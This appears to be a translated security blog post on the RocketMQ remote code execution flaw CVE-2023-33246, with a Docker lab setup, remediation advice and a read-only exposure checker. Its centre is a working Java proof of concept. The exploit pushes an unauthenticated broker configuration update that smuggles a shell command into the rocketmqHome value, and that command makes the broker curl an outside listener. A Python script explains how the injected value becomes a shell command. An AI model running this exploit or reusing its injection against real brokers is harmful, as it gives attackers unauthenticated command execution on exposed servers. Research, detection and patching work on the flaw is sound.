RocketMQ Remote Code Execution (CVE-2023-33246)
Preface
RocketMQ's NameServer, Broker, Controller and other components are exposed to the public network without any authentication. An attacker can abuse the update-configuration function to execute commands as the system user that RocketMQ runs as; the PoC below does this through the broker's update-config call.
Details: https://mp.weixin.qq.com/s/FZ3NyR8YnqWHn1pv_Dmtyg
Affected versions
Apache RocketMQ <= 5.1.0
Apache RocketMQ <= 4.9.5
Environment setup
Pull the images
docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0
Start the NameServer
docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
Create the config directory
mkdir -p /mydata/rocketmq/conf/
Create the broker configuration file on the host (the broker needs it at startup). My path here is /mydata/rocketmq/conf/broker.conf.
File contents (vim /mydata/rocketmq/conf/broker.conf):
brokerClusterName = DefaultCluster
brokerName = broker-a
brokerId = 0
deleteWhen = 04
fileReservedTime = 48
brokerRole = ASYNC_MASTER
flushDiskType = SYNC_FLUSH
brokerIP1 = 192.168.88.104
Note: 192.168.88.104 is my host IP.
Start the broker
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
Start the console
docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv -e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876 -Dcom.rocketmq.sendMessageWithVIPChannel=false" -t apacherocketmq/rocketmq-console:2.0.0
Finally, open port 8899 in a browser and the console comes up.
PoC attack
Download:
https://github.com/I5N0rth/CVE-2023-33246
mqrce.java
package org.example;

import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;

import java.util.Properties;

/**
 * Created by IntelliJ IDEA.
 *
 * @Author: Garck3h
 * @Date: 2023/5/31
 * @Time: 20:22
 * Life is endless, and there is no end to it.
 **/
public class mqrce {
    public static void main(String[] args) throws Exception {
        // Target broker remoting address(es). The broker listens on 10911 (see the docker run
        // above); updateBrokerConfig talks to the broker directly, not to the console on 8899.
        String[] urls = {"192.168.88.104:10911"};
        for (int i = 0; i < urls.length; i++) {
            updateConfig(urls[i]);
        }
    }

    public static void updateConfig(String url) throws Exception {
        Properties props = new Properties();
        // rocketmqHome is pasted verbatim into "sh <rocketmqHome>/bin/startfsrv.sh ...", which the
        // broker splits on spaces and execs. This value turns it into "sh -c $@|sh . echo curl ...",
        // so an inner sh runs the curl command. Replace 192.168.1.7:8877 with a listener you control.
        props.setProperty("rocketmqHome", "-c $@|sh . echo curl 192.168.1.7:8877");
        // The start command is only built when filter servers are enabled; the broker's periodic
        // filter-server task (roughly every 30 s) then executes it.
        props.setProperty("filterServerNums", "1");
        // Create and start the admin client; a vulnerable broker asks for no credentials
        DefaultMQAdminExt admin = new DefaultMQAdminExt();
        admin.setNamesrvAddr("192.168.88.104:9876");
        admin.start();
        // Push the new configuration to the broker (RequestCode UPDATE_BROKER_CONFIG)
        admin.updateBrokerConfig(url, props);
        // Read the configuration back to confirm the broker accepted the values
        Properties brokerConfig = admin.getBrokerConfig(url);
        System.out.println(brokerConfig.getProperty("rocketmqHome"));
        System.out.println(brokerConfig.getProperty("filterServerNums"));
        // Shut down the admin client
        admin.shutdown();
    }
}
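Why that rocketmqHome value gives command execution, as an added example that is not code from the post or from RocketMQ: a Python model of the broker-side logic the PoC relies on. The broker builds its filter-server start command as sh <rocketmqHome>/bin/startfsrv.sh -c <config> -n <namesrv>, splits the string on spaces and hands the array to Runtime.exec. The function names, the config path and the namesrv address used here are assumptions; the live run uses a harmless echo in place of the curl payload.

```python
"""Model of how the rocketmqHome payload turns into a shell command.

Added example, not code from the original post or from RocketMQ. It
reproduces the broker-side behaviour the write-up relies on: the broker
builds its filter-server start command around the attacker-controlled
rocketmqHome value, splits the string on spaces and hands the array to
Runtime.exec(). Function names, the config path and the namesrv address
are assumptions used for illustration.
"""
import subprocess
from typing import List, Optional


def build_start_command(rocketmq_home: str, config_file: str, namesrv_addr: str) -> str:
    """Unix template used by the broker: rocketmqHome is pasted in verbatim."""
    return f"sh {rocketmq_home}/bin/startfsrv.sh -c {config_file} -n {namesrv_addr}"


def split_shell_string(command: str) -> List[str]:
    """The broker splits on single spaces (no quoting rules) before exec'ing."""
    return command.split(" ")


def injected_command(rocketmq_home: str, config_file: str, namesrv_addr: str) -> Optional[str]:
    """Explain, without executing, what the '-c $@|sh . echo <cmd>' payload runs.

    After the split the argv is:  sh  -c  $@|sh  .  echo  <cmd words>...  -c <cfg>  -n <ns>
    so sh runs the script '$@|sh' with $0='.' and everything else as positional
    parameters.  $@ expands to 'echo <cmd words>... -c <cfg> -n <ns>', whose output
    is piped into a second sh: the attacker's command runs with the broker's own
    arguments appended, and '/bin/startfsrv.sh' glued onto the last payload word.
    Returns None when rocketmqHome is not shaped like this payload.
    """
    argv = split_shell_string(build_start_command(rocketmq_home, config_file, namesrv_addr))
    if argv[:3] != ["sh", "-c", "$@|sh"] or len(argv) < 6 or argv[4] != "echo":
        return None
    return " ".join(argv[5:])


def run_as_broker_would(rocketmq_home: str, config_file: str, namesrv_addr: str) -> str:
    """Exec the split argv exactly as the broker does and return sh's stdout.
    Only use this with a harmless payload such as the 'echo injected' one below."""
    argv = split_shell_string(build_start_command(rocketmq_home, config_file, namesrv_addr))
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout.strip()


if __name__ == "__main__":
    cfg, ns = "/opt/rocketmq/conf/broker.conf", "namesrv:9876"   # assumed broker settings
    # The value the post's PoC writes into rocketmqHome:
    print(injected_command("-c $@|sh . echo curl 192.168.1.7:8877", cfg, ns))
    # Live but harmless: the same shape, with 'echo injected' as the smuggled command.
    print(run_as_broker_would("-c $@|sh . echo echo injected", cfg, ns))
```

The trailing -c <config> -n <namesrv> words end up as extra arguments of the attacker's command, which is why the PoC uses a command that tolerates them and lets the glued /bin/startfsrv.sh become part of the URL path.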
Maven configuration file pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>test1</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>org.apache.rocketmq</groupId>
<artifactId>rocketmq-tools</artifactId>
<version>4.9.1</version>
</dependency>
</dependencies>
</project>
Remediation
The vendor has released fixes; affected users should upgrade to Apache RocketMQ 5.1.1 or 4.9.6. Because the update-config request needs no credentials on vulnerable versions, the NameServer (9876) and Broker (10909/10911) ports should also never be reachable from untrusted networks, and a broker that was exposed should have its configuration read back (as the PoC does with getBrokerConfig) and checked for a tampered rocketmqHome or a non-zero filterServerNums.
https://rocketmq.apache.org/download/
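A non-destructive way to check whether a broker still answers admin requests without credentials, and to spot a tampered configuration on one that was already hit, as an added example that is not part of the original post or of the RocketMQ project: it hand-encodes the RocketMQ remoting frame (4-byte total length, 4-byte serialize-type/header-length word, JSON header, body) and sends only the read-only GET_BROKER_CONFIG request (RequestCode 26), never UPDATE_BROKER_CONFIG (25). The host, port, heuristics and sample configuration are assumptions.

```python
"""Unauthenticated-admin exposure check for a RocketMQ broker.

Added example, not from the original post or from the RocketMQ project.
It hand-encodes the RocketMQ remoting frame and sends the read-only
GET_BROKER_CONFIG request (RequestCode 26). It never sends
UPDATE_BROKER_CONFIG (25), the call the PoC abuses. A broker that returns
its configuration here accepts admin traffic without credentials, which
is the condition CVE-2023-33246 needs; the returned rocketmqHome value
also shows whether the config has already been tampered with.
Host, port, the tampering heuristics and the sample config are assumptions.
"""
import json
import socket
import struct
from typing import Dict, List, Optional, Tuple

GET_BROKER_CONFIG = 26      # read-only admin request
UPDATE_BROKER_CONFIG = 25   # write request abused by the PoC; not used here
RESPONSE_SUCCESS = 0
SERIALIZE_JSON = 0          # high byte of the header-length word


def encode_command(code: int, ext_fields: Optional[Dict[str, str]] = None,
                   body: bytes = b"", opaque: int = 1) -> bytes:
    """Frame: total_len | (serialize_type<<24 | header_len) | JSON header | body."""
    header = {
        "code": code,
        "language": "JAVA",
        "version": 0,
        "opaque": opaque,           # request id echoed back in the response
        "flag": 0,                  # 0 = request that expects a response
        "extFields": ext_fields or {},
        "serializeTypeCurrentRPC": "JSON",
    }
    header_bytes = json.dumps(header, separators=(",", ":")).encode()
    header_word = (SERIALIZE_JSON << 24) | (len(header_bytes) & 0xFFFFFF)
    total_len = 4 + len(header_bytes) + len(body)   # counts the header word, not itself
    return struct.pack(">II", total_len, header_word) + header_bytes + body


def decode_command(frame: bytes) -> Tuple[Dict, bytes]:
    """Inverse of encode_command for one complete frame."""
    total_len, header_word = struct.unpack(">II", frame[:8])
    if header_word >> 24 != SERIALIZE_JSON:
        raise ValueError("only JSON-serialized headers are handled")
    header_len = header_word & 0xFFFFFF
    header = json.loads(frame[8:8 + header_len])
    body = frame[8 + header_len:4 + total_len]
    return header, body


def parse_properties(body: bytes) -> Dict[str, str]:
    """GET_BROKER_CONFIG returns the configuration as key=value lines."""
    props: Dict[str, str] = {}
    for line in body.decode("utf-8", errors="replace").splitlines():
        if "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props


def indicators(props: Dict[str, str]) -> List[str]:
    """Heuristic flags for values consistent with the update-config attack."""
    findings = []
    home = props.get("rocketmqHome", "")
    # A real install path is absolute and contains no shell metacharacters.
    if home and (not home.startswith("/") or any(c in home for c in "$|;`")):
        findings.append(f"rocketmqHome looks injected: {home!r}")
    if props.get("filterServerNums", "0") != "0":
        findings.append(f"filterServerNums={props['filterServerNums']} "
                        "(filter servers enabled, which is what triggers the exec)")
    return findings


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-frame")
        buf += chunk
    return buf


def check_broker(host: str, port: int = 10911, timeout: float = 5.0) -> Dict[str, str]:
    """Send GET_BROKER_CONFIG with no credentials and return the broker's config.
    A non-zero response code (for example with ACL enabled) means the request was
    refused, which is the state you want."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command(GET_BROKER_CONFIG))
        length_bytes = _recv_exact(sock, 4)
        (total_len,) = struct.unpack(">I", length_bytes)
        header, body = decode_command(length_bytes + _recv_exact(sock, total_len))
    if header.get("code") != RESPONSE_SUCCESS:
        raise PermissionError(f"broker refused GET_BROKER_CONFIG: "
                              f"code={header.get('code')} remark={header.get('remark')}")
    return parse_properties(body)


if __name__ == "__main__":
    config = check_broker("192.168.88.104", 10911)    # assumed lab broker from the setup above
    print(f"broker answered an unauthenticated admin request with {len(config)} settings")
    for finding in indicators(config) or ["no tampering indicators in rocketmqHome / filterServerNums"]:
        print(" -", finding)
```

Run it against the broker port, not the console: a successful answer is itself the finding, and the indicators only add whether the PoC has already been through.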
Originally published by the WeChat official account "pentest": RocketMQ远程代码执行(CVE-2023-33246)
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes none. For questions, contact us by email (preferably from a corporate or otherwise valid mailbox so the mail is not filtered; contact details are on the home page).